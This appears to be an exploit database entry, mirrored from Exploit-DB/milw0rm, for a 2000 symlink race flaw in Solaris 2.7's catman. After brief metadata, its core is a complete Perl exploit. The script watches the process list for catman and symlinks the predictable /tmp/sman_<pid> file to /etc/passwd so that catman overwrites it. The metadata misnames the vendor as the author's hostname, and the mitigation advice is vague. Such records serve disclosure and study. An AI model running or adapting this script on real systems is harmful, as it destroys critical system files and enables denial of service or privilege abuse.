Catman Symlink Vulnerability

vendor:

rootabega

by:

Vapid Labs

7,2

CVSS

HIGH

Symlink Vulnerability

CWE

Product Name: rootabega

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Solaris 2.7

2000

Catman Symlink Vulnerability

This exploit is based on the fact that catman creates files in /tmp insecurly. They are based on the PID of the catman process, catman will happily clobber any files that are symlinked to that file. The idea of this script is to watch the process list for the catman process, get the pid and Create a symlink in /tmp to our file to be clobbered. This exploit depends on system speed and process load.

Mitigation:

Ensure that the catman process is running with the least privileges and that the /tmp directory is not writable by the catman process.

Source

Exploit-DB raw data:

#!/usr/local/bin/perl -w 
#
# The problem is catman creates files in /tmp
# insecurly. They are based on the PID of the
# catman process, catman will happily clobber
# any files that  are symlinked to that file.
# The idea of this  script  is  to  watch the
# process  list  for  the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered.  This exploit depends
# on  system  speed  and  process  load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000   Vapid Labs.
# http://vapid.betteros.org

$clobber = "/etc/passwd";
while(1) {
  open ps,"ps -ef | grep -v grep |grep -v PID |";
  while(<ps>) {
    @args = split " ", $_;
    if (/catman/) { 
      print "Symlinking sman_$args[1] to  $clobber\n";
      symlink($clobber,"/tmp/sman_$args[1]");
      exit(1);
    }
  }
}


# milw0rm.com [2000-12-20]